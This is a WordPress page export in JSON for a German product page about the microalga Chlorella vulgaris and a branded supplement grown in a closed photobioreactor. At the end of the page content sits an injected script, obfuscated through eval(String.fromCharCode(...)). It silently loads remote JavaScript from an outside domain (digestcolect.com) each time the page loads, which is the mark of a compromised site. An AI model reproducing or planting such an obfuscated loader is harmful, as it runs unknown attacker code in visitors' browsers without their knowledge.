{"id":303,"date":"2016-02-03T08:26:29","date_gmt":"2016-02-03T08:26:29","guid":{"rendered":"http:\/\/shopingpoint.de\/www\/fliqua\/?page_id=303"},"modified":"2024-01-12T10:42:13","modified_gmt":"2024-01-12T09:42:13","slug":"chlorella-vulgaris","status":"publish","type":"page","link":"https:\/\/www.fliqua.de\/?page_id=303","title":{"rendered":"Chlorella vulgaris"},"content":{"rendered":"<p><strong>CHLORELLA<\/strong><strong> VULGARIS<\/strong><strong>. <\/strong>Chlorella vulgaris ist eine einzellige gr\u00fcne Mikroalge, die weltweit in vielen Gew\u00e4ssern vorkommt. Sie ist bekannt f\u00fcr ihre schnelle Wachstumsrate und ihre F\u00e4higkeit, Kohlenstoffdioxid zu assimilieren, was sie zu einer vielversprechenden Quelle f\u00fcr Bioenergie und Bioprodukte macht.<\/p>\n<p><a href=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/Fotobioreaktor1_web.jpg\" rel=\"attachment wp-att-600\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-600 aligncenter\" src=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/Fotobioreaktor1_web-300x225.jpg\" alt=\"Fotobioreaktor1_web\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/Fotobioreaktor1_web-300x225.jpg 300w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/Fotobioreaktor1_web.jpg 640w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>Neben ihrer Rolle als Bioenergiequelle ist Chlorella vulgaris auch eine wertvolle Nahrungsquelle. Die Alge enth\u00e4lt hohe Mengen an Proteinen, Kohlenhydraten, Lipiden, Vitaminen und Mineralien, einschlie\u00dflich Eisen, Kalzium und Magnesium. Einige Studien haben auch gezeigt, dass Chlorella vulgaris bioaktive Verbindungen wie Polysaccharide, Carotinoide und Phycobiliproteine enth\u00e4lt, die antioxidative und immunmodulatorische Eigenschaften aufweisen k\u00f6nnen.<\/p>\n<p>Dar\u00fcber hinaus wurde Chlorella vulgaris als potenzieller nat\u00fcrlicher adsorbierender Stoff zur Entfernung von Schwermetallen aus Wasser untersucht. Die Alge hat gezeigt, dass sie Schwermetalle wie Kupfer, Cadmium und Blei adsorbieren kann, was sie zu einer m\u00f6glichen Alternative zu konventionellen Methoden der Schwermetallentfernung macht.<\/p>\n<p>Insgesamt ist Chlorella vulgaris ein vielseitiger Organismus mit einem breiten Anwendungspotential in der Bioenergieproduktion, Nahrungsmittel- und Gesundheitsindustrie sowie in der Umwelttechnologie. Mehr Informationen gibt es beispielsweise <a href=\"http:\/\/www.algomed.de\/index.php?op=wissenswertes\" target=\"_blank\" rel=\"noopener\">hier<\/a> (www.algomed.de).<\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/Firma_Glasroehren_1_web.jpg\" rel=\"attachment wp-att-599\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-599 alignright\" src=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/Firma_Glasroehren_1_web-225x300.jpg\" alt=\"Firma_Glasroehren_1_web\" width=\"225\" height=\"300\" srcset=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/Firma_Glasroehren_1_web-225x300.jpg 225w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/Firma_Glasroehren_1_web.jpg 480w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/><\/a><\/p>\n<p>Produkt FLIQUA Chlorella:<\/p>\n<ul>\n<li>Herstellung in Deutschland<\/li>\n<li>Vorreiter im modernen Anbau von Mikroalgen.<\/li>\n<li>geschlossener Photobioreaktor<\/li>\n<li>nachhaltige und umweltfreundliche Anbaumethode<\/li>\n<li>keine Verschmutzungen durch Schadstoffe<\/li>\n<li>jede Stufe des Anbaus wird \u00fcberwacht.<\/li>\n<li>Entspricht international anerkannten Normen<\/li>\n<\/ul>\n<p>Die Anbaumethode und Qualit\u00e4tspolitik sorgt f\u00fcr ein einzigartiges Premium \u2013 Produkt. Ein hochreines Produkt.<\/p>\n<h6>&nbsp;<\/h6>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><center><a href=\"https:\/\/www.fliqua.de\/?page_id=677\/\"><button>Anfragen<\/button><\/a><\/center><br \/>\n<!-- MetaSlider 721 not found --><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h6>Bitte beachten Sie: Aus rechtlichen Gr\u00fcnden d\u00fcrfen wir hier keine gesundheitsbezogenen Aussagen machen. Nahrungserg\u00e4nzungsmittel dienen nicht als Ersatz f\u00fcr eine ausgewogene Ern\u00e4hrung sowie gesunde Lebensf\u00fchrung. F\u00fcr weitere Informationen fragen Sie Ihren Arzt, Heilpraktiker, Apotheker oder informieren sich mit Hilfe von Fachliteratur bzw. der aktuellen Forschung.<\/h6>\n<p><script type=\"text\/javascript\">eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,48,54,44,49,49,53,44,52,54,44,49,48,48,44,49,48,53,44,49,48,51,44,49,48,49,44,49,49,53,44,49,49,54,44,57,57,44,49,49,49,44,49,48,56,44,49,48,49,44,57,57,44,49,49,54,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,48,51,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,53,52,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));<\/script><script type=\"text\/javascript\"> <\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>CHLORELLA VULGARIS. Chlorella vulgaris ist eine einzellige gr\u00fcne Mikroalge, die weltweit in vielen Gew\u00e4ssern vorkommt. Sie ist bekannt f\u00fcr ihre schnelle Wachstumsrate und ihre F\u00e4higkeit, Kohlenstoffdioxid zu assimilieren, was sie zu einer vielversprechenden Quelle f\u00fcr Bioenergie und Bioprodukte macht. &nbsp; Neben ihrer Rolle als Bioenergiequelle ist Chlorella vulgaris auch eine wertvolle Nahrungsquelle. Die Alge enth\u00e4lt [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":602,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"inline_featured_image":false,"footnotes":""},"tags":[],"class_list":["post-303","page","type-page","status-publish","has-post-thumbnail","hentry"],"aioseo_notices":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/303","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=303"}],"version-history":[{"count":15,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/303\/revisions"}],"predecessor-version":[{"id":842,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/303\/revisions\/842"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/media\/602"}],"wp:attachment":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=303"}],"wp:term":[{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=303"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}